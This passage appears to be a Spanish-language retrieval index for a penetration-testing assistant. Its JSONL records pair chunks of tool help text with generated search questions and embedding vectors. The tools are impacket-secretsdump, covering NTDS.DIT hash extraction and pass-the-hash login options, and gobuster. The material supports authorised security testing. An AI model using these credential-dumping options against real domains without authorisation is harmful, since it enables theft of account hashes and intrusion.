-0.04194, -0.01047, 0.02684, -0.01025, -0.03482, 0.03313, -0.00565, -0.00985, 0.00678, 0.02076, -0.01293, -0.09463, -0.04398, 0.00086, -0.01568, -0.02225, -0.04479, -0.01236, -0.00911, -0.07471, -0.00162, -0.01085, 0.02958, 0.02484, -0.02259, -0.04866, 0.03231, -0.01146, 0.00143, 0.05638, -0.02429, 0.05418, -0.03661, -0.03445, 0.00678, -0.06454, 0.00774, -0.02126, 0.02581, -0.00727, 0.0681, 0.00905, 0.00706, 0.02111, -0.02087, 0.02533, 0.01562, 0.01694, 0.01892, -0.01077, 0.06455, -0.02093, 0.04595, 0.01975, 0.01084, 0.03353, 0.00308, 0.03487, 0.04865, -0.0093, 0.04946, 0.02854, -0.03055, -0.08023, -0.01314, -0.06511, 0.00972, -0.03353, -0.01777, 0.04167, 0.05098, 0.00832, 0.0209, -0.00461, -0.00082]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "indexar": "que programa puedo usar para extraer solo los hashes NTLM de un usuario especΓ­fico", "v": [-0.06904, 0.00276, -0.1359, -0.11761, 0.02449, -0.06275, -0.13677, -0.02692, -0.11165, 0.02659, -0.13114, -0.00318, -0.01334, -0.03491, -0.06889, -0.03218, 0.03281, -0.11952, 0.02135, 0.05692, -0.05034, -0.05259, -0.15424, -0.05207, -0.05161, -0.00459, -0.0085, -0.03462, -0.12019, 0.04158, -0.08621, 0.03969, -0.02116, -0.05877, 0.00868, -0.00402, 0.06103, -0.04002, -0.00126, 0.1273, 0.15883, 0.1208, -0.10438, 0.09683, 0.11385, 0.03944, -0.01773, -0.05209, 0.0216, -0.09127, 0.06887, 0.04248, -0.17616, -0.06264, 0.02556, -0.11988, 0.10156, -0.08694, -0.09593, 0.00152, 0.01102, -0.00117, 0.04857, -0.06794, -0.03297, -0.06539, 0.06692, 0.00908, -0.11648, 0.01583, -0.13569, 0.05894, 0.14128, -0.10217, 0.05739, 0.09909, -0.00717, -0.04164, 0.0703, -0.00285, -0.01281, -0.0921, 0.01847, -0.01124, -0.17108, -0.04173, 0.11132, -0.07008, 0.00526, -0.00928, 0.05099, 0.04376, -0.00972, -0.03554, 0.08704, -0.09961, 0.07906, 0.03952, 0.04508, 0.02416, 0.12013, -0.08912, -0.01485, 0.19097, -0.06519, -0.02723, 0.10785, -0.01882, -0.05704, 0.02333, 0.05232, -0.07065, -0.09896, -0.07262, -0.0822, 0.04228, -0.02246, -0.03161, -0.02923, -0.08257, -0.07082, -0.01485, 0.07029, 0.04101, 0.10949, -0.08416, -0.04781, 0.13665, -0.08631, -0.0147, -0.01738, 0.04624, -0.02451, 0.02812, -0.02838, -0.01459, -0.0214, -0.01775, 0.0001, 0.00034, 0.08562, 0.01072, -0.06111, 0.03398, 0.06898, -0.02563, -0.02673, -0.06405, -0.01298, -0.02886, 0.14095, -0.04856, 0.02134, -0.00115, -0.08882, 0.00575, 0.04059, -0.00894, -0.10194, 0.05534, -0.07064, -0.0136, -0.0216, -0.03555, 0.08982, -0.01607, -0.02078, -0.02393, 0.04622, 0.0756, 0.01733, 0.07146, 0.0515, -0.07149, 0.01311, -0.03334, 0.01515, -0.05802, -0.02365, -0.04583, -0.06215, 0.01976, 0.06419, -0.06382, -0.02477, -0.053, -0.0072, 0.04634, -0.0323, 0.02459, -0.03743, 0.09804, -0.01059, -0.02328, -0.014, -0.01633, -0.00408, 0.00996, 0.02146, -0.0626, -0.04384, 0.05671, 0.0293, -0.05274, 0.04975, 0.06188, -0.06678, 0.00611, 0.0404, 0.06438, 0.04881, -0.0219, 0.05945, 0.02835, -0.0571, 0.02103, 0.0339, 0.02365, 0.02796, -0.01033, -0.03257, 0.03152, 0.0599, 0.04969, 0.00631, -0.05245, 0.02963, 0.0102, -0.01433, 0.04137, -0.00377, 0.00611, -0.03821, -0.03573, 0.00568, 0.00581, -0.01192, 0.01631, -0.04853, -0.0614, -0.00933, 0.07924, 0.00617, -0.0131, -0.02226, -0.00647, -0.106, 0.07084, -0.02692, -0.03223, 0.02029, -0.009, 0.04958, -0.05072, 0.01425, 0.05098]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "indexar": "cual es la opcion correcta para mostrar el historial de contraseΓ±as y secretos LSA", "v": [0.20755, -0.00779, -0.07925, -0.02078, 0.04151, -0.20675, -0.01588, -0.23117, -0.09486, 0.03988, -0.03273, -0.06896, 0.06203, -0.0154, 0.03993, -0.01222, 0.19211, 0.01498, 0.02345, -0.0542, -0.01708, -0.05231, -0.03278, -0.03342, -0.03768, -0.11677, 0.09817, 0.01037, -0.06826, -0.08673, -0.00102, 0.0554, 0.05773, 0.02014, 0.03752, 0.28155, 0.01835, 0.06997, 0.057, 0.06936, 0.09323, 0.06631, -0.03349, 0.11085, 0.01409, -0.01408, -0.0385, 0.12534, -0.04657, -0.11267, -0.03513, -0.03861, -0.08493, -0.1019, 0.02457, -0.07301, 0.08422, 0.01221, 0.04374, 0.04426, 0.01067, 0.01982, 0.03416, 0.06079, -0.07741, -0.12053, 0.03208, -0.02698, -0.03661, 0.01608, 0.01818, 0.06943, -0.03778, 0.12156, -0.00351, 0.01696, 0.04041, 0.01681, 0.02611, 0.14106, -0.06562, -0.01766, 0.03961, 0.00662, -0.16368, 0.00652, -0.00598, -0.05566, 0.0092, -0.14984, 0.08063, 0.02426, -0.03114, 0.04826, 0.07431, -0.1071, 0.00872, -0.01584, -0.05631, -0.02783, 0.03569, 0.03189, -0.03311, 0.20417, 0.02159, 0.04741, -0.01375, -0.0168, 0.03369, -0.05843, 0.01949, 0.02206, -0.09418, -0.00038, 0.01562, -0.00744, -0.02317, -0.03096, 0.02051, -0.03044, -0.08085, -0.04532, -0.00909, 0.06185, 0.04283, 0.08613, 0.01455, 0.03752, -0.03981, -0.0102, -0.0248, -0.00207, 0.01525, 0.0133, -0.02311, 0.06242, -0.01679, -0.08558, -0.07828, -0.01398, 0.0244, -0.02861, -0.00676, -0.01727, 0.11699, -0.00591, 0.04863, -0.01865, -0.04084, 0.00915, -0.07347, 0.03581, 0.06248, 0.06431, 0.01873, 0.0091, -0.03185, -0.13682, -0.06555, 0.11493, -0.00617, 0.00146, -0.05951, 0.01042, -0.04775, -0.08467, -0.02136, 0.03577, 0.01393, -0.01882, 0.04377, 0.02095, -0.04472, -0.04551, 0.02061, -0.06364, 0.01133, -0.04372, 0.05187, -0.04623, -0.01488, -0.0366, 0.04275, 0.01088, -0.01887, -0.11014, 0.0253, 0.00746, -0.01184, -0.00955, -0.01748, -0.03961, -0.01776, 0.05878, -0.03331, -0.01505, 0.01694, -0.09862, -0.00046, -0.06411, 0.01253, 0.02237, 0.01801, -0.02944, 0.06119, 0.03531, -0.06195, -0.04238, -0.03586, -0.02445, 0.09656, -0.04163, 0.05613, -0.07435, -0.08402, -0.03808, -0.03482, 0.00503, -0.05384, -0.01482, 0.04251, 0.02125, 0.05073, -0.00449, 0.05111, -0.0191, 0.031, 0.01348, 0.02925, 0.00273, -0.01648, 0.09354, -0.07541, 0.0208, 0.09584, 0.05361, -0.02722, -0.04198, -0.02393, -0.06408, 0.02119, 0.04802, 0.02318, -0.10308, 0.01589, -0.04592, -0.05442, 0.03932, 0.0263, -0.02006, -0.06054, 0.04222, 0.01825, -0.03445, 0.0509, -0.09872]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "display options:\n -just-dc-user USERNAME\n Extract only NTDS.DIT data for the user specified.\n Only available for DRSUAPI approach. Implies also\n -just-dc switch\n -just-dc Extract only NTDS.DIT data (NTLM hashes and Kerberos\n keys)\n -just-dc-ntlm Extract only NTDS.DIT data (NTLM hashes only)\n -pwd-last-set Shows pwdLastSet attribute for each NTDS.DIT account.\n Doesn't apply to -outputfile data\n -user-status Display whether or not the user is disabled\n -history Dump password history, and LSA secrets OldVal", "indexar": "con que herramienta puedo verificar si un usuario estΓ‘ deshabilitado o obtener sus datos NTDS.DIT", "v": [-0.15782, 0.02289, -0.20448, -0.12096, 0.15846, -0.01788, -0.13312, -0.00637, -0.05706, 0.06937, -0.03406, -0.171, -0.05973, -0.13305, -0.04588, -0.06603, 0.12762, -0.1733, -0.00077, -0.03739, 0.02102, -0.17756, -0.01845, -0.077, -0.03122, 0.02687, -0.03552, 0.00248, -0.16164, 0.18812, 0.03638, -0.0368, -0.09465, -0.07619, -0.05912, -0.02826, -0.06969, 0.08926, 0.0756, -0.00495, 0.02503, 0.21218, -0.01713, 0.07236, 0.07419, -0.00454, -0.11937, -0.03426, 0.02666, -0.05323, -0.03737, 0.0073, -0.15556, -0.0214, -0.03475, -0.10545, 0.19154, -0.10174, 0.06069, -0.01379, -0.10755, -0.04412, -0.03955, 0.00244, -0.06146, -0.07114, 0.09801, 0.02248, -0.04841, 0.07593, -0.04365, 0.05614, 0.00729, -0.05875, -0.05516, -0.04238, 0.02003, 0.0538, 0.03033, 0.0116, -0.04074, -0.02144, -0.07416, 0.00606, -0.15021, -0.07538, 0.08944, -0.07814, -0.01179, -0.10207, 0.07871, 0.12218, 0.02161, -0.02616, 0.05786, 0.01626, 0.02287, -0.00166, -0.06327, -0.0231, 0.06739, 0.03618, -0.03028, 0.08091, -0.06151, 0.00464, 0.03901, 0.00015, -0.08434, -0.07357, 0.07478, 0.00563, -0.08432, -0.0003, 0.02791, 0.10026, -0.06922, -0.10377, -0.03352, -0.02636, 0.0377, 0.02472, 0.00328, -0.06372, 0.03004, 0.01583, -0.0075, 0.05964, -0.0521, -0.03283, -0.00154, -0.05501, -0.07959, -0.0074, 0.02313, 0.01798, -0.09294, -0.07626, 0.04259, -0.04104, 0.02648, 0.05029, 0.00152, -0.0039, 0.08526, -0.01366, -0.05931, -0.00438, -0.06709, 0.01789, 0.04145, -0.02449, 0.01033, 0.05277, -0.071, 0.04391, 0.01811, 0.00911, -0.06058, 0.02508, -0.02191, -0.01499, 0.00887, 0.05867, 0.03691, -0.03267, 0.05125, -0.02535, 0.0795, -0.0043, -0.04973, -0.00374, 0.0177, -0.03086, 0.01265, -0.06552, -0.00516, -0.0499, -0.02301, -0.09008, -0.04915, -0.00382, -0.0062, -0.05034, 0.00162, -0.05117, 0.02372, -0.05481, 0.00926, -0.031, 0.04162, 0.10242, 0.02573, -0.04918, 0.02255, -0.01649, -0.02023, 0.01025, 0.02134, -0.01642, -0.09384, 0.0105, -0.04896, -0.0393, 0.0173, 0.07942, -0.02742, 0.017, -0.0063, -0.01876, 0.07209, -0.00754, 0.02971, -0.06163, -0.05329, -0.08354, 0.01553, 0.00133, -0.04199, -0.00693, -0.02271, 0.04829, 0.02309, 0.00039, -0.01814, -0.01426, 0.02488, 0.02502, 0.02336, 0.03252, 0.03101, 0.00598, -0.0077, -0.0159, 0.05278, 0.00522, 0.03451, -0.00718, -0.00168, -0.05576, 0.04972, 0.06173, 0.00474, -0.04833, 0.03454, -0.02001, -0.04383, -0.00466, 0.00306, -0.08529, -0.00187, -0.01619, 0.05232, -0.05228, -0.00737, -0.04719]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "indexar": "que herramienta sirve para crujear hashes NTLM?", "v": [-0.08991, -0.14318, -0.0791, -0.13914, 0.04722, -0.15835, -0.17526, 0.11187, 0.03937, 0.10505, -0.09215, -0.01687, 0.09976, -0.0323, 0.03559, 0.09276, -0.06477, -0.1511, -0.00195, 0.08057, -0.10921, 0.00372, -0.19929, -0.06894, -0.1858, -0.08645, -0.01673, -0.00367, -0.20914, 0.05214, -0.0843, -0.0068, -0.04474, 0.04795, -0.01903, -0.05277, -0.02859, 0.02737, -0.0402, 0.16259, 0.05782, 0.10811, -0.00785, 0.11996, 0.05879, -0.06451, -0.05541, -0.00504, 0.06931, -0.01991, 0.02034, -0.05629, -0.17753, -0.04337, -0.03727, -0.08832, 0.14191, -0.04577, -0.04494, -0.1125, -0.0758, -0.02378, -0.00593, -0.17633, -0.09127, -0.07263, 0.04863, -0.03756, -0.03597, 0.01016, -0.11893, 0.01933, 0.07798, -0.11237, -0.04683, -0.00011, 0.01619, 0.07675, 0.09704, 0.05177, 0.14007, -0.05789, -0.04287, -0.01966, -0.07427, -0.04907, 0.06877, -0.00902, 0.08011, 0.01774, -0.00941, 0.06835, 0.02312, 0.01751, 0.07943, -0.0451, 0.07473, -0.06717, 0.04037, -0.0166, 0.12705, -0.09119, -0.04884, 0.04394, -0.07284, 0.02163, 0.01935, 0.00837, -0.03644, 0.06676, 0.1535, -0.01451, -0.0217, 0.03066, 0.00612, 0.08064, -0.01033, -0.02277, -0.00617, -0.0108, 0.05353, 0.04201, -0.0253, 0.05213, -0.00918, -0.01771, -0.03735, 0.07337, -0.03559, -0.0995, 0.01323, -0.0442, -0.05118, 0.0869, 0.06226, -0.07494, 0.00635, -0.09523, -0.00123, -0.0871, 0.09473, 0.06054, -0.06096, -0.064, 0.02253, 0.01925, 0.05118, -0.02802, 0.04879, -0.05764, 0.12336, -0.07082, -0.01207, 0.01179, -0.0261, -0.0101, -0.02578, 0.04876, -0.12664, 0.05667, -0.01449, -0.04034, 0.04097, 0.04709, 0.00808, -0.02457, 0.04867, 0.02709, 0.05386, 0.0269, 0.0334, 0.00394, 0.07607, -0.00985, 0.01058, -0.05226, 0.02221, 0.05574, -0.02825, -0.06983, 0.02794, -0.03086, -0.00655, -0.00866, 0.0574, -0.01695, 0.03223, 0.00147, -0.05352, -0.02134, -0.01681, 0.03601, -0.02414, -0.05233, 0.02971, 0.0315, 0.01597, -0.06227, 0.05515, -0.02459, -0.0085, 0.02527, 0.00234, -0.04443, 0.03388, 0.0699, -0.02101, -0.02355, 0.02274, 0.03768, -0.00406, 0.00723, -0.00017, 0.00416, -0.00335, -0.00902, -0.00089, 0.03076, -0.00769, -0.02361, -0.00411, -0.01177, 0.00195, 0.00202, -0.01673, 0.00736, 0.0023, 0.01539, -0.00147, -0.02989, 0.04522, -0.02218, 0.00095, 0.0343, -0.01306, -0.06636, 0.01012, 0.01342, -0.01228, -0.02313, -0.00428, 0.0155, 0.0174, 0.00351, -0.00108, -0.02745, 0.00688, -0.04801, -0.01494, -0.00951, -0.00068, -0.02507, 0.05126, -0.00267, -0.019, 0.02286]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "indexar": "con que puedo usar autenticaciΓ³n Kerberos sin contraseΓ±a?", "v": [-0.00342, -0.02211, -0.13674, -0.03229, 0.01369, -0.09865, -0.0439, 0.01576, -0.09879, -0.09629, -0.11475, 0.00668, -0.02616, -0.03098, 0.04251, -0.01193, 0.05736, 0.01993, 0.12025, 0.09825, 0.13736, -0.05746, 0.01229, -0.05164, -0.03192, 0.01345, 0.05652, -0.03808, -0.02854, -0.08023, -0.03513, 0.05998, 0.06656, 0.03086, 0.00981, 0.13015, -0.09257, 0.14721, 0.10044, 0.139, 0.14613, 0.10152, -0.0141, 0.19556, -0.01466, 0.11947, 0.03493, 0.02477, 0.01322, 0.02024, -0.07316, -0.08556, -0.12674, -0.05904, -0.08418, -0.13237, 0.18793, -0.00751, 0.02512, 0.00921, -0.09958, 0.00979, -0.01539, 0.12062, -0.07097, -0.16709, 0.07516, -0.0108, -0.05568, 0.05362, 0.01303, 0.0403, -0.03293, 0.05857, 0.04821, 0.0456, 0.00518, -0.0405, 0.05483, 0.14984, -0.07479, -0.02685, 0.08839, -0.02319, -0.0757, -0.06537, 0.0915, -0.04923, 0.08889, -0.11979, 0.04093, -0.03016, -0.00181, -0.04038, 0.01192, -0.08851, -0.10885, 0.01676, -0.07611, -0.06135, 0.03399, -0.03047, 0.01251, 0.12255, 0.02214, -0.02109, -0.01681, -0.01443, 0.04157, -0.10817, 0.00419, -0.02853, -0.10065, -0.06352, -0.03982, 0.03756, -0.08066, -0.12007, 0.01744, 0.0026, -0.05323, -0.09802, 0.03166, -0.05909, 0.0595, 0.05175, 0.0286, 0.09257, -0.05819, -0.0442, -0.0015, 0.00163, -0.03198, -0.00497, -0.0452, 0.03705, -0.0812, -0.13195, -0.0863, 0.0299, 0.01233, 0.03267, -0.00234, -0.04455, 0.04537, 0.065, -0.02595, -0.0422, -0.092, -0.00972, -0.00062, 0.01139, -0.00159, 0.07618, -0.01622, 0.04186, 0.00637, -0.0743, 0.00197, 0.07555, -0.0768, -0.03682, -0.02689, 0.07712, -0.06687, -0.06004, 0.01938, 0.0129, 0.02295, 0.07679, 0.04841, 0.11076, 0.03605, -0.00381, 0.02658, -0.00952, 0.02999, -0.03389, -0.03373, -0.08265, 0.00602, -0.06658, -0.01091, -0.03221, 0.02428, -0.0202, 0.06672, -0.01944, -0.03607, 0.01832, 0.03639, 0.01281, 0.01094, 0.08024, -0.01735, -0.00765, 0.00744, -0.0439, 0.02305, -0.05712, -0.02508, 0.01505, -0.01874, -0.04679, 0.12688, 0.02949, -0.11841, -0.01225, -0.04205, 0.01165, 0.03375, -0.07026, 0.05028, -0.07126, -0.05779, -0.0379, 0.00747, 0.0237, -0.08923, -0.00026, 0.054, 0.07999, 0.04865, 0.06246, 0.05635, 0.0053, -0.01253, -0.00927, -0.01175, 0.00024, -0.05666, 0.06812, -0.06689, 0.02059, 0.09079, 0.0023, -0.03368, -0.02721, -0.04955, -0.04155, -0.03754, 0.0451, 0.00857, -0.05702, -0.06159, -0.00369, -0.08738, 0.01488, 0.00066, -0.01879, -0.04045, -0.01511, 0.02081, -0.01998, 0.01637, -0.00251]} +{"tipo": "pregunta", "herramienta": "impacket-secretsdump", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-secretsdump.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -keytab KEYTAB Read keys for SPN from keytab file\n\nconnection:\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -target-ip ip address\n IP Address of the target machine. If omitted it will\n use whatever was specified as target. This is useful\n when target is the NetBIOS name and you cannot resolve\n it\n```", "indexar": "cual es una alternativa libre para hacer conexiones a controladores de dominio?", "v": [0.1316, 0.05178, -0.0386, -0.02592, -0.09235, -0.02734, 0.0872, -0.00679, -0.20591, 0.01468, -0.04455, -0.19588, -0.0206, -0.12815, 0.02913, -0.05934, 0.19488, -0.03809, 0.03785, -0.09354, -0.04943, -0.04626, -0.03515, -0.0888, 0.01119, -0.08283, 0.00391, -0.02573, -0.08234, 0.08222, 0.01417, -0.06639, 0.11951, 0.12738, -0.01183, -0.00451, 0.09255, 0.16087, 0.2349, 0.03752, -0.00926, -0.06885, -0.13348, 0.02451, 0.01245, 0.00202, -0.02249, -0.0955, 0.03144, -0.0181, -0.08823, -0.02445, -0.08977, -0.0335, 0.05104, -0.0281, 0.1243, -0.15472, -0.02046, -0.03922, -0.04761, -0.06525, 0.10538, 0.07894, -0.08725, -0.05177, -0.05359, -0.02445, -0.08578, 0.12348, 0.05894, -0.03456, 0.0519, 0.00555, -0.01145, 0.01914, 0.02974, -0.02183, 0.04023, 0.00677, 0.06924, -0.06451, -0.05965, -0.06651, -0.03586, -0.05923, -0.09628, -0.1561, -0.03536, 0.02344, 0.07517, 0.0253, -0.02624, 0.03365, -0.01862, -0.05475, -0.00962, 0.02907, -0.06158, 0.06876, 0.16273, 0.17997, -0.14251, 0.09711, 0.07006, 0.02221, 0.06214, -0.0052, -0.03483, 0.02517, -0.0161, 0.04976, -0.01523, -0.01978, -0.03938, 0.01976, -0.07705, -0.00588, 0.01062, -0.0446, -0.04195, -0.0952, 0.04079, -0.05969, 0.05263, 0.07285, 0.05561, 0.02891, -0.04292, -0.03873, 0.0821, -0.07179, 0.00685, -0.14988, -0.05401, 0.02445, 0.09911, -0.0627, 0.01906, -0.03515, -0.03759, 0.03226, -0.02455, -0.02016, 0.00984, -0.08431, 0.02181, -0.00571, 0.01583, -0.01681, -0.13215, 0.02568, -0.09037, 0.08842, 0.02565, 0.04731, -0.07992, 0.0399, -0.01338, 0.07956, 0.05628, -0.00507, -0.06154, -0.02767, 0.0229, -0.03538, -0.01992, -0.0003, -0.0868, 0.04598, -0.06384, 0.07891, 0.03508, -0.03057, 0.01778, -0.06565, -0.01545, -0.09806, 0.02177, -0.05073, 0.02074, -0.01302, -0.03617, 0.01447, 0.00364, 0.06803, 0.00327, 0.02843, -0.00137, 0.07418, -0.01915, 0.03065, -0.02673, -0.02922, 0.03415, -0.01684, 0.07764, -0.03681, -0.02255, -0.005, -0.01443, -0.05213, 0.02262, 0.0102, -0.02768, -0.00644, 0.00487, 0.00213, 0.05618, 0.03325, 0.02276, 0.00921, 0.04911, -0.03097, -0.02493, 0.02464, -0.03315, -0.0054, 0.00778, -0.0892, -0.00526, 0.00772, -0.00133, 0.02566, 0.05396, 0.00092, -0.0083, 0.03406, -0.03559, 0.022, 0.00721, -0.01672, 0.04424, 0.01694, 0.02923, -0.01282, 0.00896, 0.01764, 0.03622, 0.02957, -0.02525, 0.0391, 0.00418, -0.00292, -0.06412, -0.02502, -0.11317, -0.0159, -0.05483, -0.00776, 0.02183, 0.01072, 0.03765, 0.02101, -0.03112, 0.04345]} +{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# gobuster β€” manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "indexar": "que herramienta sirve para enumerar subdominios y buckets de almacenamiento en la nube?", "v": [0.03008, -0.06654, -0.18715, -0.11152, 0.00744, -0.0525, -0.1018, -0.00535, -0.06227, -0.16463, -0.20991, -0.05472, -0.08182, -0.02464, -0.11505, 0.00891, -0.01516, -0.1436, -0.07343, 0.07716, 0.02147, 0.00018, -0.1397, 0.08165, -0.08748, 0.01125, 0.06426, 0.09834, -0.18294, 0.12211, 0.00799, -0.00829, 0.04809, -0.0769, -0.08256, -0.12831, -0.03244, -0.00703, -0.15878, 0.03728, -0.00116, 0.08527, -0.113, 0.12328, -0.09756, -0.00568, -0.05557, 0.00779, 0.03952, -0.01204, -0.11396, -0.08273, 0.00179, 0.02452, -0.05357, -0.114, 0.09312, -0.10658, 0.0963, -0.01313, -0.16491, 0.02243, 0.04284, -0.12107, 0.08239, 0.04305, -0.08357, -0.02508, -0.12742, 0.02143, -0.02781, 0.00373, 0.10452, -0.03896, -0.01872, 0.07592, 0.07775, 0.10821, -0.03125, 0.05679, -0.0167, 0.06009, 0.00942, 0.04276, -0.06624, -0.10351, 0.07716, -0.05047, 0.01274, 0.02741, 0.01542, 0.07905, 0.02737, 0.08458, 0.07264, -0.00038, 0.03198, 0.06819, -0.03334, -0.0429, 0.17412, 0.01588, -0.01747, 0.05697, -0.04011, 0.0684, -0.02044, -0.10019, -0.02663, -0.06143, 0.10836, 0.00214, 0.05969, 0.0594, -0.04354, 0.00838, -0.00178, -0.05716, 0.01986, -0.00542, 0.05083, -0.04131, -0.03393, -0.00167, 0.04054, -0.01134, -0.07379, 0.04476, -0.03784, -0.03973, -0.02156, 0.04884, -0.03852, 0.09267, 0.0439, -0.08166, -0.00777, -0.12551, 0.06761, -0.08091, 0.02128, -0.00958, -0.0545, -0.01602, 0.0203, -0.06404, 0.06834, 0.00226, -0.0415, -0.07363, 0.08011, -0.00483, -0.04655, 0.03996, -0.04087, 0.04849, -0.04371, -0.0165, -0.15569, 0.00576, 0.01542, -0.03694, -0.02397, 0.02728, -0.03464, -0.0911, 0.02818, 0.00739, 0.03597, 0.04127, 0.01302, -0.02439, -0.00303, -0.03553, 0.01397, -0.00629, 0.0031, -0.02247, 0.06139, -0.03169, -0.04602, -0.03915, -0.03715, 0.09501, -0.04755, -0.08102, 0.00685, -0.04594, 0.0082, 0.0814, -0.00399, -0.02098, -0.04547, -0.06556, 0.01079, -0.05112, -0.03734, -0.01442, 0.02768, 0.04608, -0.06124, 0.02386, -0.0252, -0.02813, -0.02048, 0.03113, -0.09966, 0.03406, 0.01972, -0.01593, 0.01194, -0.01125, -0.01562, -0.06198, -0.03738, -0.04534, 0.01349, 0.03822, -0.07299, -0.04266, -0.03909, -0.04203, -0.00084, -0.04838, -0.05846, 0.04433, 0.02714, 0.07308, 0.04318, 0.01792, -0.00492, -0.00649, 0.01049, -0.00053, 0.01774, -0.02265, 0.0356, -0.00403, -0.00465, 0.00317, -0.03124, 0.03349, 0.00304, -0.00818, -0.069, -0.04725, -0.04346, 0.03313, -0.00595, -0.0341, 0.01172, 0.06164, -0.00053, -0.05223, 0.03387, -0.01234]} +{"tipo": "pregunta", "herramienta": "gobuster", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/gobuster.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# gobuster β€” manual\n\nSalida de `gobuster --help`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nUsage:\n gobuster [command]\n\nAvailable Commands:\n completion Generate the autocompletion script for the specified shell\n dir Uses directory/file enumeration mode\n dns Uses DNS subdomain enumeration mode\n fuzz Uses fuzzing mode. Replaces the keyword FUZZ in the URL, Headers and the request body\n gcs Uses gcs bucket enumeration mode\n help Help about any command\n s3 Uses aws bucket enumeration mode\n tftp Uses TFTP enumeration mode\n version shows the current version\n vhost Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)", "indexar": "con que puedo hacer un escaneo rΓ‘pido de directorios y direcciones DNS?", "v": [-0.06226, -0.04288, -0.12667, -0.08003, 0.03412, 0.01599, -0.0376, -0.04782, -0.11128, 0.09933, -0.00113, -0.12489, -0.12404, -0.37222, -0.06878, -0.03949, 0.15329, 0.08389, 0.06468, 0.03994, -0.13388, -0.0761, -0.13142, 0.11331, 0.01251, -0.02838, -0.06959, 0.04332, -0.15991, 0.09779, -0.00726, -0.0401, 0.00528, 0.02993, -0.01549, 0.00142, 0.01688, 0.0356, 0.08779, 0.05259, -0.01069, 0.06945, -0.17349, -0.02636, -0.058, -0.08997, 0.01033, -0.06534, 0.04238, -0.18044, -0.02504, -0.05404, -0.11703, -0.04886, 